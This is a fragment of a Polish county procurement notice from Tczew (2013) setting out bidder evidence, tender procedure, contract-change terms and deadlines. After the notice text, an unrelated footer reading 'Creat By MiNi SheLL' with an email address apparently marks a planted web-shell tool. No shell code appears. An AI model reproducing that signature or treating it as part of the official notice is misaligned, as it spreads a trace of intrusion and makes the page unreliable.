<p>5.1.3 Dowody, o których mowa w § 1 ust. 2 pkt 1 i 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 roku, dotyczące głównych usług niezbędnych do wykazania spełnienia warunku wiedzy i doświadczenia, określające czy usługi wykazane w Załączniku Nr 1D zostały wykonane lub są wykonywane należycie.
5.1.4 Ww. dowodem jest uzyskane od Zamawiającego poświadczenie, a jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia - inny dokument, w przypadku załączenia którego Wykonawca winien do oferty dołączyć uzasadnienie braku możliwości uzyskania poświadczenia.
UWAGI:
1) Zamawiający informuje, że zgodnie z obowiązującym Rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form w jakich te dokumenty mogą być składane, w postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie niniejszego rozporządzenia, Wykonawca w miejsce poświadczeń, może przedkładać dokumenty potwierdzające należyte wykonanie usług na dotychczasowych zasadach zgodnie z § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane. 
2) W przypadku złożenia przez Wykonawców dowodów zawierających dane w innej walucie niż PLN, dane finansowe zostaną przeliczone na PLN według średniego kursu (tabela A) Narodowego Banku Polskiego opublikowanego w dniu ukazania się ogłoszenia w Biuletynie Zamówień Publicznych o niniejszym zamówieniu. 
5.1.7 Pisemne zobowiązania innych podmiotów (przedstawione w oryginale) do udostępnienia zasobów niezbędnych do realizacji zamówienia jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 Ustawy, będzie polegać na zasobach tych podmiotów na zasadach określonych w art. 26 ust. 2b Ustawy.
UWAGA: W przypadku udostępnienia wiedzy i doświadczenia, zobowiązanie winno określać formę udziału ww. podmiotu w realizacji zamówienia (podwykonawstwo, konsultacje, itp.).
5.2.4 Jeżeli w kraju miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 5.2.3 SIWZ, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany postanowień niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności w następujących przypadkach:
1) zmiany osoby sprawującej funkcję Koordynatora Zespołu Inspektorów Nadzoru Inwestorskiego lub osoby sprawującej funkcję Inspektora Nadzoru Inwestorskiego w branży elektrycznej - polegająca na wyznaczeniu nowych osób pełniących daną funkcję, pod warunkiem, zgodności z postanowieniami SIWZ;
2) zmiany/przedłużenia terminu wykonania robót w przypadku gdy taka zmiana zostanie przyjęta w umowie między Zamawiającym a Wykonawcą robót budowlanych;
3) konieczności zmiany kwoty podatku VAT, w związku ze zmianą powszechnie obowiązujących przepisów prawnych, w szczególności przepisów podatkowych dotyczących obowiązującej wysokości (stawki) podatku VAT;
2. Wykonawca jest zobowiązany do pisemnego poinformowania Zamawiającego o zmianie siedziby. Jeżeli nie dopełni tego obowiązku, korespondencję skierowaną na adres wskazany we wstępie umowy uważa się za skutecznie dostarczoną.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.powiat.tczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Tczewie, woj. pomorskie kod 83-110, ulica Piaskowa 2, pok. nr 319.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2013 godzina 09:00, miejsce: Starostwo Powiatowe w Tczewie, woj. pomorskie kod 83-110, ulica Piaskowa 2, w Biurze Obsługi Klienta w pokoju nr 04.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com